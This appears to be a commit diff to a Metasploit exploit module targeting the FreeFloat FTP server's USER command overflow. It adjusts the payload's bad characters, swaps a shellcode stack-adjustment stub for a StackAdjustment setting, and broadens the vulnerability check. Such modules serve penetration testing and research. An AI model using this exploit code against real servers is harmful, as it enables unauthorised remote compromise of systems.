...

Author: dougsko

modules/exploits/windows/ftp/freefloatftp_user.rb

@@ -35,8 +35,9 @@ def initialize(info = {})
 				{
 					'Space'          => 500,
 					'DisableNops'    => true,
-					'BadChars'       => "\x00\x0a\x0d\x20\x5c",
-					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+					'BadChars'       => "\x00\x0a\x0d",
+					#'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+					'StackAdjustment' => -3500
 				},
 			'Targets'		 =>
 				[
@@ -59,11 +60,11 @@ def initialize(info = {})
 	def check
 		connect
 		disconnect
-		print_status(banner)
-		if (banner =~ /220 FreeFloat Ftp Server (Version 1.00)/)
+		if (banner =~ /FreeFloat/)
 			return Exploit::CheckCode::Vulnerable
+		else
+			return Exploit::CheckCode::Safe
 		end
-		return Exploit::CheckCode::Safe
 	end
 
 	def exploit